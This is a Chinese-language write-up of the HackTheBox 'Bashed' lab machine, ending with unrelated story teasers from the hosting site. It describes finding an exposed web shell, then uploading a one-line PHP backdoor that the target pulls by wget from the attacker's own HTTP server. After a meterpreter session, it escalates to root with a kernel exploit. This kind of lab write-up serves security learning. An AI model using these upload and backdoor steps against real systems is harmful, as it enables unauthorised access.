【HTB】Bashed(可執(zhí)行命令漏洞毕源,內(nèi)核提權(quán))

信息收集

image.png

開了80端口它抱,瀏覽器打開看看


image.png

一個叫phpbash的軟件秕豫,網(wǎng)站找了一圈好像沒有啥可以利用的東西。
目錄爆破看看:


image.png

打開dev目錄观蓄,發(fā)現(xiàn)兩個文件
image.png

打開phpbash.php混移,發(fā)現(xiàn)是一個shell
image.png

攻擊

因為可以執(zhí)行任意shell,那就可以上傳任意文件通過msf拿到meterpreter侮穿,生成一個木馬歌径,在本地開一個http服務,通過wget的方式從目標機器拉取本地的后門文件亲茅。
需要注意的是回铛,不能直接拉取本地的php文件,必須在本地打包以后再拉取芯急,我在這里就傻了勺届,搞了半天驶俊。娶耍。。
另外饼酿,dev目錄是沒有寫權(quán)限的榕酒,需要在uploads文件夾操作
最近知道m(xù)sf里有一個中國菜刀的模塊,于是決定用一下故俐。
寫一句話木馬:


image.png

執(zhí)行打包:

zip caidao.zip caidao.php

本地開啟apache:

service apache2 start

在網(wǎng)頁shell拉取

wget -P /var/www/html/uploads  http://10.10.14.20/caidao.zip

解壓:

unzip /var/www/html/uploads/caidao.zip -d /var/www/html/uploads/caidao
image.png

拿到meterpreter:


image.png

提權(quán)

查看系統(tǒng)版本

image.png

根據(jù)內(nèi)核版本找了一圈想鹰,最后在這篇文章提到的方法里找到了一個提權(quán)腳本。
編譯药版,上傳辑舷,執(zhí)行
image.png

拿到root權(quán)限和flag

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市槽片,隨后出現(xiàn)的幾起案子何缓,更是在濱河造成了極大的恐慌,老刑警劉巖还栓,帶你破解...
    沈念sama閱讀 221,820評論 6 515
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件碌廓,死亡現(xiàn)場離奇詭異,居然都是意外死亡剩盒,警方通過查閱死者的電腦和手機谷婆,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,648評論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人纪挎,你說我怎么就攤上這事期贫。” “怎么了异袄?”我有些...
    開封第一講書人閱讀 168,324評論 0 360
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵唯灵,是天一觀的道長。 經(jīng)常有香客問我隙轻,道長埠帕,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 59,714評論 1 297
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任玖绿,我火速辦了婚禮敛瓷,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘斑匪。我一直安慰自己呐籽,他們只是感情好,可當我...
    茶點故事閱讀 68,724評論 6 397
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布蚀瘸。 她就那樣靜靜地躺著狡蝶,像睡著了一般。 火紅的嫁衣襯著肌膚如雪贮勃。 梳的紋絲不亂的頭發(fā)上贪惹,一...
    開封第一講書人閱讀 52,328評論 1 310
  • 城市分裂傳說
    那天,我揣著相機與錄音寂嘉,去河邊找鬼奏瞬。 笑死,一個胖子當著我的面吹牛泉孩,可吹牛的內(nèi)容都是我干的硼端。 我是一名探鬼主播,決...
    沈念sama閱讀 40,897評論 3 421
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼寓搬,長吁一口氣:“原來是場噩夢啊……” “哼珍昨!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起句喷,我...
    開封第一講書人閱讀 39,804評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤镣典,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后脏嚷,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體骆撇,經(jīng)...
    沈念sama閱讀 46,345評論 1 318
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,431評論 3 340
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年父叙,在試婚紗的時候發(fā)現(xiàn)自己被綠了神郊。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片肴裙。...
    茶點故事閱讀 40,561評論 1 352
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖涌乳,靈堂內(nèi)的尸體忽然破棺而出蜻懦,到底是詐尸還是另有隱情,我是刑警寧澤夕晓,帶...
    沈念sama閱讀 36,238評論 5 350
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布宛乃,位于F島的核電站,受9級特大地震影響蒸辆,放射性物質(zhì)發(fā)生泄漏征炼。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,928評論 3 334
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一躬贡、第九天 我趴在偏房一處隱蔽的房頂上張望谆奥。 院中可真熱鬧,春花似錦拂玻、人聲如沸酸些。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,417評論 0 24
  • 一樁弒父案檐蚜,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽魄懂。三九已至,卻和暖如春闯第,著一層夾襖步出監(jiān)牢的瞬間市栗,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,528評論 1 272
  • 情欲美人皮
    我被黑心中介騙來泰國打工乡括, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留肃廓,地道東北人智厌。 一個月前我還...
    沈念sama閱讀 48,983評論 3 376
  • 代替公主和親
    正文 我出身青樓诲泌,卻偏偏與公主長得像,于是被迫代替她去往敵國和親铣鹏。 傳聞我的和親對象是個殘疾皇子敷扫,可洞房花燭夜當晚...
    茶點故事閱讀 45,573評論 2 359

推薦閱讀更多精彩內(nèi)容